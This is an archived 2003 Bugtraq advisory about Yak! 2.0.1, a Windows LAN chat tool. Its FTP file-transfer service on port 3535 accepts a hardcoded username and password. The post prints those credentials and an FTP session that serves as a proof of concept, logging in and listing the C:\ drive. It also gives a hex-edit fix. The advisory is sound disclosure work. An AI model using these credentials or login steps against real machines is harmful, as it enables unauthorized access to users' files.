lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 12 Sep 2003 09:06:23 -0000
From: bil <bil_912@...lgoose.com>
To: bugtraq@...urityfocus.com
Subject: Yak! 2.0.1 file trasfer exploit




http://www.digicraft.com.au/yak/

yak 2.0.1 is a software for chattin in lan environment for windows

it supports file transfers. the default port it listens is 3535.
connecting at 3535 

telnet localhost 3535 gives up nice :

        " 220 ICS FTP Server ready. "

meaning for file transfers ftp is being used. but the real pain starts when just by listening with a sniffer it was found ...

             username : Yak
             password : asd123

and logging in with this credentials gives almost full permission to the users' filesystem.

======================PoC========================

ftp> open localhost 3535
Connected to desktop.
220 ICS FTP Server ready.
User (desktop:(none)): Yak
331 Password required for Yak.
Password:
230 User Yak logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
C:\TEMP\*.* not found
226 File sent ok
ftp: 23 bytes received in 0.01Seconds 1.53Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/" is current directory.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw-   1 ftp      ftp            0 Aug 07 19:58 CONFIG.SYS
-rwxrwxrwx   1 ftp      ftp            0 Aug 07 19:58 AUTOEXEC.BAT
drw-rw-rw-   1 ftp      ftp            0 Sep 08 00:42 yak201
-r--r--r--   1 ftp      ftp    783764060 Sep 04 01:05 AVSEQ00.DAT
-r--r--r--   1 ftp      ftp    793687148 Sep 04 02:27 AVSEQ01.DAT
-rw-rw-rw-   1 ftp      ftp          217 Sep 09 11:53 bil.reg
drw-rw-rw-   1 ftp      ftp            0 Aug 07 21:03 Program Files
drw-rw-rw-   1 ftp      ftp            0 Aug 09 01:39 test
drw-rw-rw-   1 ftp      ftp            0 Aug 30 10:17 Norton AntiVirus
226 File sent ok
ftp: 594 bytes received in 0.00Seconds 594000.00Kbytes/sec.
ftp>

======================PoC========================

QUICK FIX :
-----------
            with a hexeditor i found "asd123" <- the password 
at offset :  
                A5B40
                A5E81

changing the 6 char password to anything else like -> "asX12X" may
be a quick fix. 

also the username changing should result the same.

Powered by blists - more mailing lists